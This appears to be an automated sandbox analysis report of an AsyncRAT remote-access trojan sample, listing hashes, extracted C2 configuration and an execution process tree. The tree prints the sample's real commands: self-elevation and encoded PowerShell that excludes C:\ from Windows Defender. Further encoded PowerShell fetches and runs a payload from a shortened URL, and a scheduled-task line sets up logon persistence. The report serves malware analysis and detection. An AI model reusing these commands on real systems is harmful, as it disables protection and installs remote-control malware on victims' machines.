Overview

overview

10

Static

static

3

revershesh...TO.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    101s
  • max time network
    104s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250313-en
  • resource tags

    arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    30/03/2025, 12:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    reversheshell b64 bat TO.exe

  • Size

    88KB

  • MD5

    aa8d4f9a7cea9c7c8de61478ae5a7f81

  • SHA1

    5b8ce5f94b702731877e55822dfb505af4332fa6

  • SHA256

    cb89e6fafecf411a75df6cb06b2302e8f3c9696232dbdff6b25b3d6bec635c91

  • SHA512

    2f54a16ad0a7a0ec8c6ea4f08cd28c587a6ac29421ec1433150e80e164d48bdd312480a86b15477deee4e11f3cf331823400a9fc858451fc4eaf59213577c982

  • SSDEEP

    1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf3xP+:fq6+ouCpk2mpcWJ0r+QNTBf3B+

Score
10/10
asyncratdefaultdiscoveryexecutionrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://tinyurl.com/VIRGPLOAD

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

holefo2785-22820.portmap.host:22820

holefo2785-22820.portmap.host:6606
Mutex

Oma7kBAtvlxY

Attributes
  • delay

    3

  • install

    true

  • install_file

    discord.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Executes dropped EXE 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 2 IoCs
    defense_evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\reversheshell b64 bat TO.exe
    "C:\Users\Admin\AppData\Local\Temp\reversheshell b64 bat TO.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:560
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6428.tmp\6429.tmp\642A.bat "C:\Users\Admin\AppData\Local\Temp\reversheshell b64 bat TO.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2968
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w h -command ""
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3532
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\Users\Admin\AppData\Local\Temp\reversheshell b64 bat TO.exe"' -ArgumentList 'am_admin'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3412
        • C:\Users\Admin\AppData\Local\Temp\reversheshell b64 bat TO.exe
          "C:\Users\Admin\AppData\Local\Temp\reversheshell b64 bat TO.exe" am_admin
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4800
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6B6C.tmp\6B6D.tmp\6B6E.bat "C:\Users\Admin\AppData\Local\Temp\reversheshell b64 bat TO.exe" am_admin"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:388
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -w h -command ""
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4524
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3528
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2116
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4548
              • C:\Windows\system32\reg.exe
                "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
                7⤵
                  PID:4500
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB0AGkAbgB5AHUAcgBsAC4AYwBvAG0ALwBWAEkAUgBHAFAATABPAEEARAAiAA0ACgAkAG8AdQB0AHAAdQB0ACAAPQAgACIAJABlAG4AdgA6AFQAZQBtAHAALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAG8AdQB0AHAAdQB0AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAG8AdQB0AHAAdQB0AA==
                6⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2912
                • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
                  "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:5276
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "discord" /tr '"C:\Users\Admin\AppData\Roaming\discord.exe"' & exit
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2040
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "discord" /tr '"C:\Users\Admin\AppData\Roaming\discord.exe"'
                      9⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:5100
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp88F6.tmp.bat""
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:6068
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 3
                      9⤵
                      • System Location Discovery: System Language Discovery
                      • Delays execution with timeout.exe
                      PID:2844
                    • C:\Users\Admin\AppData\Roaming\discord.exe
                      "C:\Users\Admin\AppData\Roaming\discord.exe"
                      9⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2880
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "discord"
                        10⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:1560
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /delete /f /tn "discord"
                          11⤵
                          • System Location Discovery: System Language Discovery
                          PID:1340
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4EF6.tmp.bat""
                        10⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:5740
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout 3
                          11⤵
                          • System Location Discovery: System Language Discovery
                          • Delays execution with timeout.exe
                          PID:5912

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      627073ee3ca9676911bee35548eff2b8

      SHA1

      4c4b68c65e2cab9864b51167d710aa29ebdcff2e

      SHA256

      85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

      SHA512

      3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      d8b9a260789a22d72263ef3bb119108c

      SHA1

      376a9bd48726f422679f2cd65003442c0b6f6dd5

      SHA256

      d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

      SHA512

      550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      446dd1cf97eaba21cf14d03aebc79f27

      SHA1

      36e4cc7367e0c7b40f4a8ace272941ea46373799

      SHA256

      a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

      SHA512

      a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\6428.tmp\6429.tmp\642A.bat
      Filesize

      1KB

      MD5

      67ce8577d16577bede59e604f52ec2de

      SHA1

      c0a7b9d0f0082d227a2e9ae125c09afa08b30ec6

      SHA256

      1cf31abdbb120a1449dd41cbdcf6a183f136dfb525c255c9a5793df5c5a84ba6

      SHA512

      a2491767e88064922bfc42740ec983b04097339cac9fdb93e11cc1fd6344ad52a4bb1cadb3a0a7e11578d84b4ce4da85b04388ba72c620b425a824d70e2fcd3e

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
      Filesize

      48KB

      MD5

      f814cb9c71d35f8bd503b6d9949aca22

      SHA1

      96cb19b70bbcab9627cc3c37a384287a1162dc7c

      SHA256

      d5965c899e5413e91ab7b75669b35d6797b5462c64f99f217a4014e8e4deafbd

      SHA512

      072b7a7cc5be22435d9c498f85479ac51891dbcb2fac8305236f156bada662398e35d53507cc5c4c5094f7bb7c979a47136249f9e7094dd652a1f9e5fb1c3a5f

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lgpho4la.4bi.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmp4EF6.tmp.bat
      Filesize

      156B

      MD5

      b5bf3bfd1e100245782838b5099bca1f

      SHA1

      9eef43a2c6b3e8724a241b20decfe2bf7f8a6d9a

      SHA256

      bf3c8bba68ea25ad2a2f59a6e8381ef9d7416cd7b7fa678f13a5e88147cfb1fb

      SHA512

      24b780e8d9703857720e56a1c2e3af5e040fa94600b7588534b035578e9bbceea80c7c5e2884e3c92dfd8dba0a441572607f7c0b774238b02cc45bbc8be12bfd

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmp88F6.tmp.bat
      Filesize

      151B

      MD5

      f0bf80be461755d5c672e8bcee8f4e4b

      SHA1

      5063111e0cc186865849ecc612e56c65beca1530

      SHA256

      1e097360cd11e262c99072becf6acfe89467ad7dc1cf81a30a6e4e89d7a2cfa1

      SHA512

      d6232678a1e157d0d1e7053e70d157088d91b1a0fe74cbfd60c824cba4d2798b9ccbb8fcb21d95179e5df5eb4292264618e36b06e16a3ece85385f846233445e

      Download Submit

    • memory/2880-104-0x0000000006950000-0x0000000006EF6000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/2880-105-0x00000000071C0000-0x0000000007236000-memory.dmp

      Filesize

      472KB

      Download

    • memory/2880-106-0x0000000007140000-0x00000000071A4000-memory.dmp

      Filesize

      400KB

      Download

    • memory/2880-107-0x0000000007260000-0x000000000727E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3532-16-0x00007FFD30FB0000-0x00007FFD31A72000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3532-13-0x00007FFD30FB0000-0x00007FFD31A72000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3532-12-0x00007FFD30FB0000-0x00007FFD31A72000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3532-8-0x000001D56EBD0000-0x000001D56EBF2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3532-2-0x00007FFD30FB3000-0x00007FFD30FB5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/5276-91-0x0000000000C80000-0x0000000000C92000-memory.dmp

      Filesize

      72KB

      Download

    • memory/5276-92-0x0000000005E00000-0x0000000005E66000-memory.dmp

      Filesize

      408KB

      Download

    • memory/5276-93-0x0000000006290000-0x000000000632C000-memory.dmp

      Filesize

      624KB

      Download